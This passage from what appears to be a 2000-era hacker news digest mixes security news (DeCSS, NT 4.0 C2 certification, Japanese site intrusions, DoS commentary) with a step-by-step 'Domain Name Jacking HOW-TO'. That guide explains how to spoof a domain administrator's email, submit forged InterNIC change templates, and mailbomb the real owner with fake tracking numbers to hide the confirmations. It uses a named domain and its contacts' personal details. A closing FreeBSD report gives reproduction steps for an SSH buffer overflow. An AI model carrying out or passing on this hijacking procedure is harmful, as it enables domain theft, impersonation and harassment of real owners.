an encryption system that makes it impossible to play them back, except in a player that has the right software to decrypt the disk. Of course, this software is built into living-room DVD players, and is included with DVD-ROM players for personal computers. The trouble is that while this decryption software exists for the most common computer systems --Apple's Macintoshes or machines running Microsoft's Windows -- there wasn't a DVD decoder program that would work with Linux, the upstart operating system cobbled together by hundreds of part-time hackers worldwide. So, as hackers will, some Linux folk got busy and wrote their own program. A group of Europeans, including a Norwegian teenager named Jon Johansen, figured out how to break DVD encryption and created software called DeCSS to let Linux users watch DVD movies. And of course, they posted this software on the Internet. What did they do that for? The Motion Picture Association of America and a DVD industry trade group ran screaming to court, and Norwegian cops hauled young Mr. Johansen down to the precinct house for a scary interrogation. The movie moguls demanded not only that dozens of individuals remove DeCSS from their Web sites, but also that they remove Web links to other pages where the software might be found. This last demand should have all of us passing out leaflets on street corners. The freedom to share information, regardless of its source, is at the heart of the Internet. A court order forcing a Web site to stop linking to a questionable source of information would be like ordering a library to stop offering a controversial book. Thank heaven that federal and California state judges refused to go along with the ban on links. But the judges did issue temporary injunctions forcing Web sites to take down their own copies of DeCSS, on the grounds that the program may amount to an illegal theft of the movie industry's trade secrets. This has outraged the hacker community, and publications such as 2600: The Hacker Quarterly have called for protests and boycotts outside of movie theaters. Readers of 2600 in the Boston area were urged to meet at the Prudential Center on Friday, and then swoop down on local movie theaters with protest leaflets in hand. Maybe I went to the wrong theater. Or maybe it was too cold and dreary. Or maybe the local hacker community thinks this issue isn't as black-and-white as some would have us believe. A chat with the DVD encryption folks revealed that they're happy to share their secrets with Linux computer makers -- for a $10,000 fee. One company, Sigma Designs, has paid the fee, and is now bringing out a circuit card that'll let Linux computers legally run DVDs. You might think this would satisfy the hackers, but you'd be wrong. They're arguing that they have a right to bypass DVD encryption without getting anybody's permission. It's called "reverse engineering" -- taking apart somebody else's hardware or software, figuring out how it works, and then using that knowledge to create a compatible product. It's done all the time in the computer business, and there are court cases that have found it to be legal. The hackers, then, are standing on principle, fighting for their right to dismantle and study software whenever they please. The movie industry, for its part, points to law protecting trade secrets. The DVD encryption system is just such a secret, they say, and the creators of DeCSS smashed the lock, rather than pay $10,000 for a copy of the key. There are serious arguments on both sides, a level of ambiguity that wouldn't likely appeal to the kids shivering outside the Cheri, waiting to see a bunch of Hollywood teenagers get slashed to death. No wonder the hackers stayed home. ; AFTERWORD: Well, well, well. I really was at the wrong theatre. An alert reader pointed me to a page on the 2600 Web site, filled with after-action reports on the Friday protest. Instead of hitting the nearest cinema, as I'd assumed, the Boston-area hackers headed for the Avalon dance club over on Lansdowne, where they leafleted up a storm. What's Avalon got to do with DVD movies? Beats the stew out of me; I'm just too rational for my own good sometimes. HB, 2/07/99, 9:10 p.m. Hiawatha Bray's digitalMASS software column runs every Monday. He is also a technology reporter for The Boston Globe, and writes his Upgrade column every Thursday. His e-mail address is bray@globe.com. @HWA 155.0 ISN need C2 security? - stick with NT 4.0 by Susan Menke ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: "John Q. Public" <tpublic@dimensional.com> [Please remember this when the MS droids come to your office and try to push NT4 C2 certification on you. - John] http://www.gcn.com/vol19_no3/news/1284-1.html February 7, 2000 If you need C2 security, youll have to stick with NT 4.0 By Susan M. Menke GCN Staff Agencies that have a "hard requirement" for C2 security will have to wait two or more years before adopting Microsoft Windows 2000, says James Arnold, technical director of Science Applications International Corp.'s Trusted Technology Assessment Program laboratory. Arnolds TTAP team in Columbia, Md., last month announced the C2 certification of amended versions of the 4-year-old Windows NT 4.0 Server and Workstation operating systems under the National Security Agencys Trusted Computer System Evaluation Criteria. Arnold said agencies existing installations of NT 4.0 Server and Workstation must have NT Service Pack 6 and several hot fixes installed to qualify at the C2 security level. C2 certification has been a moving target for NT 4.0 for several years [GCN, Oct. 26, 1998, Page 8]. Until the SAIC lab completed its work, NT 3.5 had been the only C2-certified Microsoft OS. Specific environment The San Diego company's lab, with Microsoft funding and NSA supervision, tested the NT 4.0 OSes on Compaq Computer Corp. uniprocessor and multiprocessor systems in networked and standalone modes. The configurations included ProLiant 6500 and 7000 servers and Compaq Professional Workstation 5100s and 8000s, in addition to a Hewlett-Packard Co. digital audio tape drive and HP LaserJet printers. Strictly speaking, only those specific configurations are C2-certified with NT 4.0. The required NT Service Pack 6 and hot fixes are downloadable from the Web at www.microsoft.com. Arnold said the software fixes also can be obtained on CD-ROM from Microsoft Corp. "Lots of requests for proposals require C2 or the equivalent," Arnold said. "C2 means the OS can identify and authenticate users and can control and audit their access to data." The lab's certification effort began with NT 4.0 Service Pack 3 and continued through packs 4, 5 and 6. Work will now begin on Windows 2000. "The evaluation process is still evolving," he said. Arnold and Frank Simmons, vice president at SAIC's Center for Information Security Technology, said the lab also is evaluating Microsoft SQL Server. ISN is sponsored by Security-Focus.COM @HWA 156.0 ISN: Sites cracked with id's and passwords ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.yomiuri.co.jp/newse/0208cr21.htm Akiko Kasamaand Masato Takahashi Yomiuri Shimbun Staff Writers The hackers behind a recent series of invasions of government-run Web sites may have gained access to the sites by stealing the user names and passwords belonging to the engineers operating the systems, according to investigation sources. The hackers may have replaced the user names and passwords with new ones after illegally entering computer servers that operate the Web sites. The hackers are also suspected of erasing communications records--known as logs--in an attempt to remove information that could help trace them. Currently, specialists and investigators are trying to work out how hackers gained access to the Web site servers. The sites broken into include those run by the Science and Technology Agency and the National Institute for Research and Advancement (NIRA), an affiliate of the Economic Planning Agency. The computer servers were running under two kinds of operating systems. Investigators are increasingly convinced that the engineers managing the systems failed to properly set up the servers when they entered their user information into the systems. Observers question whether the system managers lived up to their obligations as operators of Web site servers. System managers are in charge of running and overseeing information systems and computer networks at companies and government offices. Their status is almost godlike regarding computer security. They issue user names to other users, have the authority to decide the framework of each organization's computer security system and are able to erase logs that record the sender, time and place of origin of messages. After the Science and Technology Agency Web site was broken into on Jan. 24 and 26, access to the site was tested using the user name and password of the official system manager. The site, however, could not be accessed as the user name and password were not recognized after a hacker had created a new password. After the NIRA site was broken into on Jan. 26, officials found that the hacker had impersonated a system manager using a user name and password of the hacker's own invention, as the site had not been set up to recognize only the system manager's user name and password. The logs--the only means of tracing the hacker--were erased under the name of system managers on both sites. Hackers broke into two kinds of operating systems in the recent cases. They usually use special hacking software to scout out bugs left during programming on the operating system and the software for creating Web sites. They then input specific commands to obtain user names and passwords. Hackers in the recent cases might have obtained user names and passwords through uncorrected bugs. Nonetheless, the NIRA site case shows that hackers did not hesitate to take advantage of slack site management, the sources said. Hacking into a system to obtain a user name and password involves searching for an unlocked port. Portscanning is a hacking tool that does this automatically. Portscanning was used in more than 12,000 intrusions into the National Personnel Authority and the authority's Kinki regional office sites, which stores government employee exam information. The deleted logs make tracing the hackers in the recent cases difficult. Also, as hackers usually use a number of servers to try to invade a targeted site, tracing failed hacking attempts does not help much in identifying the Web site trespassers. If hacking routes cross national boundaries, jurisdiction and national interest issues also come into play. Although investigators traced illegal entries to the sites of The Asahi Shimbun and The Mainichi Shimbun to a South Korean provider, they were unable to get any further leads. The series of hacking cases has prompted several Internet security companies to begin offering instruction on security measures and to put antihacking goods on the market. Asgent Inc., a security software company based in Chuo Ward, Tokyo, will hold a free seminar on Feb. 16 and 17 targeting company computer system managers and focusing on the skills needed to prevent hacking and transform the contents of hacked Web sites. For more information, call the Asgent at (03)5643-2561. The Japanese unit of Network Associates Inc., based in Minato Ward, Tokyo, has started distributing free samples of CyberCop Monitor, its software for detecting illegal Web site access in real time. The samples will be sent out for free until the end of March to those who complete the application form on the company's Web site at http://www.nai.com/japan. --------------------------------------------------- "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *=================================================* ISN is sponsored by Security-Focus.COM @HWA 157.0 ISN: Who are these jerks anyway? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://upsidetoday.com/Opinion/38a211670.html Who Are These Jerks, Anyway? February 10, 2000 by Richard L. Brandt The real question about the "denial of service" (DoS) attacks on major Web sites this week is: Just who are these jerks, anyway? It could be virtually anyone. Except for non-jerks. You have to be a jerk to pull this kind of stunt. It seems to be nothing but a prank. There is no political ideology, no monetary gain, no anger against the sites being attacked. There is just the thrill of having done it and knowing that all those important newscasters on television are talking about something you did. Gee, aren't you special? If it were political or a protest against particular sites or e-commerce in general, there should be some sort of manifesto, someone claiming credit. The point of a terrorist attack is to let people know why you did it, in an attempt to change something you don't like. But in this case, no one is claiming credit or telling us why it's happening. Further, although there are certainly unscrupulous people who would attack a site in order to make money -- say, short a stock before the attack -- usually such a person would be smart enough to keep a low profile. When a lot of prominent sites are attacked at once, investors realize this is an anomaly and not a problem unique to the company being attacked. The stocks of these companies did not decline as much as some observers thought they might. That's why the main speculation seems to be that this is being done by adolescents (in mind if not in body). "The people who have done this in the last couple days are amateurs," says Alex Samonte, chief engineer at SiteSmith, a company that helps build Web sites. "It appears to be just for the fun of it." Samonte has a lot of experience on this issue, as someone who has been building Web sites for a long time. He did some of the work on the original Yahoo site. We should distinguish between these amateurs (or "jerks") and that underground computer community that calls itself "hackers." The hacker communities are really pissed off right now, because every television news program in the universe is talking about the "hacker attacks." Hackers like to figure out how systems work. They like to find obscure weaknesses that can be exploited. The more difficult, the better. There is status in being able to do something sophisticated. And many of them try to demonstrate their power by showing it off in some relatively harmless way, posting an obscene message, say, rather than shutting down a site. Most hackers do not consider DoS attacks to be true hacking. You can do it automatically, using one of several rogue programs available on the Internet. (One early program, still popular, is called Smurf, although there are a lot more sophisticated programs these days.) Using such a program makes this kind of attack a simple process that we used to call "cookbooking" in chemistry lab. You don't have to know how it works, just follow the directions and you get the reaction you want. The problem in this case is that we don't know what reaction the attackers want. Hacker news sites are complaining. On 2600: The Hacker Quarterly, for example, writers say they're insulted to be linked to these attacks by implication. The site's editors do concede, however, that the attackers have a reasonable knowledge of Internet topology. (Suggestion to the hacker community: Find a new name for yourself. The term "hacker" has been co-opted by the press to mean any computer attacker, malicious or not. The public's definition of the word is different than yours. You can't change that now.) The reason these attacks are so disturbing is that it could be some 14-year-old jerk doing it. And some of the recent attacks could be done by copycats, an even more despicable breed of jerk, because they don't even show any originality. And it's not that I agree with hackers who may be trying to prove a point or make a statement, but the randomness of these attacks is clearly worse. The world is moving toward e-commerce, and it can be halted by some pimply-faced kid who doesn't have a life. Isn't that a pleasant image of the information revolution? When I was in college at a really geeky school called Harvey Mudd College, there were lots of phone phreaks and geeks who liked to show that they could make free calls off the college president's phone line with their homemade blue boxes. I'd hang out with them sometimes and get a giggle out of doing something naughty. But then I grew up. The current attacks demonstrate the double-edged sword of any new technology. The Web empowers the individual to do great things. It can also amplify his or her tendency to be a jerk and hurt a lot of people. With every new privilege comes a new responsibility, and these folks are irresponsible. They don't deserve access to the Web, but we don't know how to deny them service, unless they are caught. Apparently, that will be difficult to do. It is not difficult to disguise yourself, or make it appear that you are operating from a different address. It's called spoofing. According to Samonte of Sitesmith.com, in order to trace the attack back to the origin, you have to do it while the attack is occurring, probably tracing back through several different servers, ISPs and network providers -- with their cooperation. But the people operating the target sites are too busy putting out fires, trying to get their sites back up, to spend time doing the tracing. Here's another difficult problem: DoS attacks use innocent computers to do the attacking. They do not exploit security problems in the target sites, they attack security problems in other computers on the Internet. They get other computers -- and it could be your home computer with a DSL connection -- to send hundreds of messages to the target site. Enlist enough of those computers and you can overwhelm a site with too much traffic. Therefore, companies that can best prevent such attacks are the Network Service Providers or Internet Service Providers, not the target Web sites themselves. The ISPs know all the network addresses that should be routing signals through their services. These spoofed messages would have strange IP addresses on them. So theoretically, the ISPs could block any messages with the wrong address. But they may have thousands of legitimate addresses to keep track of, and those change every day as new clients join up and old ones drop off. It is not that trivial or cheap, and the ISPs themselves have nothing to gain by it. They would only do it to prevent another company from being attacked. In other words, "What's my motivation?" To be nice? Government subsidies might do the trick, but we know how bad government subsidies are. Right? Longer term, there are solutions. Major sites need to distribute their servers and add as much redundancy as possible. That will make it harder for the attackers to find and target all their servers, increasing the odds that the site will keep running. But that's not an overnight job. But in the meantime, this is a perfect example of the difficulty of putting a powerful tool in the hands of the people: Some people are jerks. --------------------------------------------------- "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *=================================================* ISN is sponsored by Security-Focus.COM A response follows; Hi William, You raised a few interesting points in your previous mail. I would like to add to a couple with my own, if I may. * 2600, "The Hacker Quarterly", can in no way act disgusted by these attacks and hold insult for being linked to them. When I was a teenager, sitting around with an all powerul 96 modem (speed!) the magazine was a good read. Informative, and fun. Now however, it panders to nothing more than the scr1p7 k1d33. Disseminating information is one thing - tell me how to propogate an attack in rough technical terms, and I would be able to work it out, probably learning a lot on the way. It is doubtful that I would take the attack beyond my own network and my friends, though. However, 2600 is guilty of providing source code directly and/or direct links in several cases. This is not passing the information under the ideal of "free speech". This is passing the gun to a teenage idiot with a seriously bad attitude. Thanks, I got that one of my chest - it's been bugging me for a while now! :-) >Here's another difficult problem: DoS attacks use innocent computers >to do the attacking. * Innocent is in one way correct, William, but in another I think not. DoS attacks are older than my cleanest pair of socks, and this particular type is not new. The information pertaining to it, and ensuring that your system is not amongst those compromised is freely and easily available. Steps should have been taken by now to ensure that your machine is not one of those used. Whether it be a home box or not - people need to act in a responsible way. You would lock your guns in a cabinet, rahter than leave them outside on the window ledge, wouldn't you? What I'm saying is that security is only as good as the next weak machine, and we should not tolerate weak machines. I was discussing on the FreeBSD mailing list with a chap recently these things, after Yahoo! was had. The best way would be to have machines removed from the backbone - how is that done? The only other option we could come up with was along your lines. Perhaps, we thought, we could start a list dedicated to nothing more than recording the IP addresses of machines used to propogate such attacks. Provide some tools to automate things as much as possible, and sysadmin now has a list of IP addresses that they can drop at the border. We then mail the blocked sites to let them know what is happening. In this way we could take some responsibility that the people who should be taking it don't seem to want - we could reduce site of the playing field for the morons out there. OK, so the problem doesn't go away, but it is a step in the right direction, don't you think? >But in the meantime, this is a perfect example of the difficulty of >putting a powerful tool in the hands of the people: Some people are >jerks. Couldn't have put it any better! Regards, Johnathan Meehan "A jug of wine, A leg of lamb And thou! Beside me, Whistling in the darkness." "Be Ye Not Lost Among Precepts of Order..." - The Book of Uterus 1;5 ISN is sponsored by Security-Focus.COM @HWA 158.0 Hellvisory #001 - Domain Name Jacking HOW-TO by Lucifer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From vuln-dev mailing list __________________________________________________________________________________ Domain Name Robbery (aka Domain-Jacking): A Flaw in InterNIC Authentication Scheme ---------------------------------------------------------------------------------- By Lucifer Mirza (lucifermirza@hotmail.com) ___________ Disclaimer: ----------- This sole purpose of the information contained in this advisory is to point out the flaws in InterNIC's domain name handling system and is intented for education. Any abuse of the information in whole or in part is NOT my responsibility nor do I encourage illegal activities. The below mentioned technique involves a planned step by step way of stealing different sorts of com/net/org/gov/mil domain names. ______ Tools: ------ * anonymous remailer or mail bomber which could spoof email adresses (I used Kaboom). * access to internet and mainly networksolutions.com website. * Social Engineering skills for timing the emails. * A fake email address at hotmail.com or any other free service. ____________ Intructions: ------------ As an example for this advisory, I will take the domain name wi2000.org. Go to networksolutions.com and click on the link that says 'Who Is.' Now enter the domain name (wi2000.org in this case) in the search field and click on the 'Search' button. This would show you the WhoIs information as shown below ___________________________________________________________ Registrant: WI2000 (WI24-DOM) Blixered 1 Goteborg, Lila Edet 46394 SE Domain Name: WI2000.ORG Administrative Contact: MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM 545326-3445 (FAX) 545326-3445 Technical Contact, Zone Contact: Jason, Berresford (BJE41) jasonb@MOUNTAINCABLE.NET 1-(905)-765-5212 Billing Contact: MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM 545326-3445 (FAX) 545326-3445 Record last updated on 22-Jan-2000. Record created on 19-Dec-1999. Database last updated on 3-Feb-2000 14:29:53 EST. Domain servers in listed order: NS1.CAN-HOST.COM 24.215.1.6 NS2.MOUNTAINCABLE.NET 24.215.0.12 ____________________________________________________________ Now you have two choices here: -01> Either you could take full control of the domain by changing the Administrator's handle information. OR -02> You could simply point the domain to another host and let it recover in time by itself. The first approach is very aggressive and could be hazardous if you are going for gov or mil domain names so I recommend second approach for gov and mil domains. ___________________________ Intiating the First Attack: --------------------------- Let me first explain the InterNIC authentication system in case most of you would be the readers who do not have their own domain names. The problem with InterNIC authentication is that they do NOT send a confirmation email if the request is sent from the same email as the person owning the contact or the domain name itself! Therefore, utilizing this flaw one could spoof anyone's email address and change any domain name's information. Although, a confirmation is required from the person to whom the domain is about to be transferred; and that shouldn't be too hard as it would your own email address ;-) Here's a step by step procedure: - Go to http://www.networksolutions.com/ - Click on the link that says 'Make Changes.' - Enter the domain name wi2000.org - You should be presented with 2 blue buttons - Click on the one that says *Expert* - Next screen would have a heading 'Select the form that meets your needs' - Click on the link that say 'Contact Form' - Next you should see a form with 2 fields. - In the first field enter the admin's handle (wi2000.org admin is AMM367) - In the next field enter his/her email address (in this case it's HACKEDINDUSTRIES@HOTMAIL.COM) - Change the option to 'Modify.' - Now 'Proceed to Contact Information.' - Select the MAIL-FROM option and click the 'Go on to Contact Data Information.' - Now you should see all the information about the admin contact of domain name! - In the E-mail address field change the email to your own fake email. (I changed it to dd@doom.com) - Now 'Proceed to Set Authorization Scheme.' - Again choose MAIL-FROM and enter the email address of the admin (HACKEDINDUSTRIES@HOTMAIL.COM) - Leave the bottom option to 'No' and 'Generate Contact Form.' - Now you should see a template with all the information. Similar to this: ______________________________________________________________________________ ******************* Please DO NOT REMOVE Version Number ********************** Contact Version Number: 1.0 **************** Please see attached detailed instructions ******************* Authorization 0a. (N)ew (M)odify (D)elete.: Modify 0b. Auth Scheme.............: MAIL-FROM 0c. Auth Info...............: Contact Information 1a. NIC Handle..............: AMM367 1b. (I)ndividual (R)ole.....: Individual 1c. Name....................: MICKE, ANDERSSON 1d. Organization Name.......: WI2000 1e. Street Address..........: BLIXERED 1 1f. City....................: GOTEBORG 1g. State...................: LILLA EDET 1h. Postal Code.............: 46394 1i. Country.................: SE 1j. Phone Number............: 545326-3445 1k. Fax Number..............: 545326-3445 1l. E-Mailbox...............: dd@doom.com Notify Information 2a. Notify Updates..........: AFTER-UPDATE 2b. Notify Use..............: AFTER-USE Authentication 3a. Auth Scheme.............: MAIL-FROM 3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM 3c. Public (Y/N)............: NO ________________________________________________________________________________ _____ NOTE: Do NOT press the button at the bottom that says 'Mail this contact form to me!' ----- Copy and paste this message into your anonymour remailer or mailbomber and you are ready to go; but WAIT! It's not that easy, now comes the HARD part! When you mail this message to hostmaster@networksolutions.com a message similar to the following would be sent to the admin email address: ____________________________________ Subject: [NIC-000128.4r50] Your Mail __________________________________________________________________________ This is an automatic reply to acknowledge that your message has been received by hostmaster@networksolutions.com. This acknowledgement is "NOT" a confirmation that your request has been processed. You will be notified when it has been completed. If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message. If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL's: Domain Name Registration Service Agreement http://www.networksolutions.com/legal/service-agreement.html Domain Name Registration Template ftp://www.networksolutions.com/templates/domain-template.txt Regards, Network Solutions Registration Services *********************************************** *********************************************** IMPORTANT INFORMATION *********************************************** On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at ftp://www.networksolutions.com/templates/domain-template.txt for all template requests. The terms and conditions of the Service Agreement are available on our Web site at http://www.networksolutions.com/legal/service-agreement.html. ************************************************ The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours. Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant’s address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information. To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to hostmaster@internic.net. This form is available on our Web site at www.networksolutions.com To register or update information about a name server, complete and submit the Host Form to hostmaster@internic.net. This form is also available on our Web site. Network Solutions Registration Services e-mail: help@networksolutions.com _______________________________________________________________________ You should now be thinking that this message could get you in trouble but there is a way of getting rid of this trouble. Here you'll use your mailbomber to mailbomb the guy with 20-30 similar messages if you want your attack to be successful. The person would see 35 messages from the same address and therefore would delete all of them and you'd probably be safe. If he 'would' email someone then he would probably reply to the wrong tracking number. In the above case, the tracking number is [NIC-000128.4r50]. OK, here another hard part. You have to open your notepad and generate similar numbers actually come up with them. You should NEVER mailbomb the person with the same tracking number. What I mean is that you should never send more than one emails to him from [NIC-000128.4r50] in the next email, change the [NIC-000128.4r50] to [NIC-000127.5089] or something different. Here is a list of some numbers that I generated just to give you a good idea of how the scheme works. [NIC-000127.5089] [NIC-000128.4rg7] [NIC-000128.523f] [NIC-000127.53d0] [NIC-000129.r609] [NIC-000128.3f6y] [NIC-000128.5d8t] [NIC-000127.r509] [NIC-000128.4r30] [NIC-000127.d307] _____ NOTE: Remember to change the number at both places. In the subject as well as the email ----- body! In the case of wi2000.org you will send the email messages to HACKEDINDUSTRIES@HOTMAIL.COM from hostmaster@internic.net. The message subject and body are already described above. Stop after you have mailed him/her 10-15 messages! Now it's time to email hostmaster@networksolutions.com with our fake email as HACKEDINDUSTRIES@HOTMAIL.COM So again, in this case the message will be sent to hostmaster@networksolutions.com from HACKEDINDUSTRIES@HOTMAIL.COM with the following template that we created above: ______________________________________________________________________________ ******************* Please DO NOT REMOVE Version Number ********************** Contact Version Number: 1.0 **************** Please see attached detailed instructions ******************* Authorization 0a. (N)ew (M)odify (D)elete.: Modify 0b. Auth Scheme.............: MAIL-FROM 0c. Auth Info...............: Contact Information 1a. NIC Handle..............: AMM367 1b. (I)ndividual (R)ole.....: Individual 1c. Name....................: MICKE, ANDERSSON 1d. Organization Name.......: WI2000 1e. Street Address..........: BLIXERED 1 1f. City....................: GOTEBORG 1g. State...................: LILLA EDET 1h. Postal Code.............: 46394 1i. Country.................: SE 1j. Phone Number............: 545326-3445 1k. Fax Number..............: 545326-3445 1l. E-Mailbox...............: dd@doom.com Notify Information 2a. Notify Updates..........: AFTER-UPDATE 2b. Notify Use..............: AFTER-USE Authentication 3a. Auth Scheme.............: MAIL-FROM 3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM 3c. Public (Y/N)............: NO ________________________________________________________________________________ _____ NOTE: Do NOT put anything in the Subject! ----- Just send one email! Do NOT bomb hostmaster@networksolutions.com with more than one emails!! That's pretty much it. Now continue to bomb HACKEDINDUSTRIES@HOTMAIL.COM, changing the tracking number everytime until your 30-35 tracking numbers are used up! Now all you gotta do it WAIT. After 24 hours you could go and change the domain information and no one would be there to stop you because now you are the admin of the domain name! _____ NOTE: This attack will only work on domains that have an admin contact different ----- from their technical contact! ____________________________ Intiating the Second Attack: ---------------------------- This attack will be successful even if the technical and admin contact are the same but the admin of the contact needs to be kind of stupid to disregard emails from interNIC as he is also the technical contact; but this method should work as it has worked for me. The procedure is basically the same apart from the fact that this time: - Go to http://www.networksolutions.com/ - Click on the link that says 'Make Changes.' - Enter the domain name wi2000.org - You should be presented with 2 blue buttons - Click on the one that says *Expert* - Next screen would have a heading 'Select the form that meets your needs' - Click on the link that say 'Service Agreement.' - Now when it asks for email address, enter your own. - Now you should see many fields, don't panic! - Go to the technical contact and change the handle to freeservers, hypermart e.t.c. - Now come to 'Nameserver Information.' - Change the nameservers to hypermart or freeserver nameservers. - If there's anything in the 'Optional Information' after that then simply delete them. - Click on the button 'Submit this form for processing.' - You are done, the form will be emailed to your email address. - When the form arrives in your email, then simply take this part: ___________________________________________________________________________________ **** PLEASE DO NOT REMOVE Version Number or any of the information below when submitting this template to hostmaster@networksolutions.com. ***** Domain Version Number: 5.0 ********* Email completed agreement to hostmaster@networksolutions.com ********* AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s) through our online application process or by applying for and registering a domain name as part of our e-mail template application process or by using the service(s) provided by Network Solutions under the Service Agreement, Version 5.0, you acknowledge that you have read and agree to be bound by all terms and conditions of this Agreement and any pertinent rules or policies that are or may be published by Network Solutions. Please find the Network Solutions Service Agreement, Version 5.0 located at the URL <a href="http://www.networksolutions.com/legal/service-agreement.html"> http://www.networksolutions.com/legal/service-agreement.html</a>. [ URL <a href="ftp://www.networksolutions.com">ftp://www.networksolutions.com</a> ] [11/99] Authorization 0a. (N)ew (M)odify (D)elete.........: M Name Registration 0b. Auth Scheme.....................: MAIL-FROM 0c. Auth Info.......................: 1. Comments........................: 2. Complete Domain Name............: wi2000.org Organization Using Domain Name 3a. Organization Name................: WI2000 3b. Street Address..................: Blixered 1 3c. City............................: Goteborg 3d. State...........................: Lila Edet 3e. Postal Code.....................: 46394 3f. Country.........................: SE Administrative Contact 4a. NIC Handle (if known)...........: AMM367 4b. (I)ndividual (R)ole?............: Individual 4c. Name (Last, First)..............: 4d. Organization Name...............: 4e. Street Address..................: 4f. City............................: 4g. State...........................: 4h. Postal Code.....................: 4i. Country.........................: 4j. Phone Number....................: 4k. Fax Number......................: 4l. E-Mailbox.......................: Technical Contact 5a. NIC Handle (if known)...........: BJE41 5b. (I)ndividual (R)ole?............: Individual 5c. Name(Last, First)...............: 5d. Organization Name...............: 5e. Street Address..................: 5f. City............................: 5g. State...........................: 5h. Postal Code.....................: 5i. Country.........................: 5j. Phone Number....................: 5k. Fax Number......................: 5l. E-Mailbox.......................: Billing Contact 6a. NIC Handle (if known)...........: AMM367 6b. (I)ndividual (R)ole?............: Individual 6c. Name (Last, First)..............: 6d. Organization Name...............: 6e. Street Address..................: 6f. City............................: 6g. State...........................: 6h. Postal Code.....................: 6i. Country.........................: 6j. Phone Number....................: 6k. Fax Number......................: 6l. E-Mailbox.......................: Prime Name Server 7a. Primary Server Hostname.........: NS1.CAN-HOST.COM 7b. Primary Server Netaddress.......: 24.215.1.6 Secondary Name Server(s) 8a. Secondary Server Hostname.......: NS2.MOUNTAINCABLE.NET 8b. Secondary Server Netaddress.....: 24.215.0.12 END OF AGREEMENT For instructions, please refer to: "http://www.networksolutions.com/help/inst-mod.html" ____________________________________________________________________________________ - Now launch your anonymous remailer or mailbomber. - From: the domain admin (HACKEDINDUSTRIES@HOTMAIL.COM in this case). - To: hostmaster@networksolutions.com - Subject: (do not enter any subject, leave the field blank!) - Body: the template you created above. - You are ready to go but before you send this email to InterNIC, remember to bomb HACKEDINDUSTRIES@HOTMAIL.COM with similar emails but different tracking numbers as we did in the first procedure. - After sending 10-20 emails, send the above template to InterNIC. - Continue bombing your 40 messages. Remember to generate 40-50 tracking numbers. - This is basically it. - The domain would be transferred to freeservers or hypermart and then you could simply activate it from there on your own email address. Remember to use a fake email. ________________________ Nameservers and Handles: ------------------------ Freeservers Technical Handle: FS4394 Primary Nameserver: NS3.FREESERVERS.COM Primary Nameserver IP Address: 209.210.67.153 Secondary Nameserver: NS4.FREESERVERS.COM Secondary Nameserver IP Address: 209.210.67.154 Hypermart Technical Handle: DA3706-ORG Primary Nameserver: NS1.HYPERMART.NET Primary Nameserver IP Address: 206.253.222.65 Secondary Nameserver: NS2.HYPERMART.NET Secondary Nameserver IP Address: 206.253.222.66 _______________ Possible Fixes: --------------- As you have seen, InterNIC does not use the tracking number system too efficiently. Possible fixes would certainly be a confirmation email to the admin contact 'with' a tracking number. NOT the email saying 'Your request is being processed' but a confirmation email which would ask, 'Do you agree with this request?' even if it has been sent from the same email address as admin's! Tracking numbers could be easily generated and the attacks I have mentioned above aren't too hard for a script kiddie with a canned bomber. @HWA 159.0 SSHD Buffer overflow exploit (FreeBSD) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.freebsd.org/cgi/query-pr.cgi?pr=14749 Problem Report ports/14749 /usr/ports/security/ssh/ has remote buffer-overflow Confidential no Severity serious Priority medium Responsible freebsd-ports@FreeBSD.org State closed Class sw-bug Submitter-Id current-users Arrival-Date Sat Nov 6 11:40:00 PST 1999 Closed-Date Sat Nov 20 16:27:49 PST 1999 Last-Modified Sat Nov 20 16:27:49 PST 1999 Originator N/A <N/A@FreeBSD.ORG> Release RELENG3 Organization N/A Environment FreeBSD XXXXXX 3.3-STABLE FreeBSD 3.3-STABLE #6: Thu Sep 30 20:23 :42 PDT 1999 root@XXXXXXX:/usr/src/sys/compile/GARLIC i386 Description There appears to be an exploitable buffer-overrun in the SSH 1.2.27 version in ports, with the RSAREF implementation. SSH 1.2.27 is seemingly no longer supported. It goes like that... sshd.c, do_connection at line 1513 gets a long number from the remote side. It proceeds to pass it into rsa_private_decrypt. rsa_private_decrypt (in rsaglue.c) has a ~200 byte buffer which can be overflowed, giving a SIGBUS or SIG 11. It might take some talent to overflow this because of the conversions. How-To-Repeat In ssh-1.2.27, modify your sshconnect.c, do_login, change every instance of SSH_SESSION_KEY_LENGTH to SSH_SESSION_KEY_LENGTH+500, and comment out the call to a_public_encrypt (otherwise, you'd crash yourself). A true exploit would probably only encrypt some of the buffer, leaving the rest to cause problems. Fix don't use static buffers here, or do a simple bounds check. Audit-Trail State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Nov 20 16:27:08 PST 1999 State-Changed-Why: patch-ax, committed by imp@freebsd.org, fixes this problem. Submit Followup www@FreeBSD.org @HWA 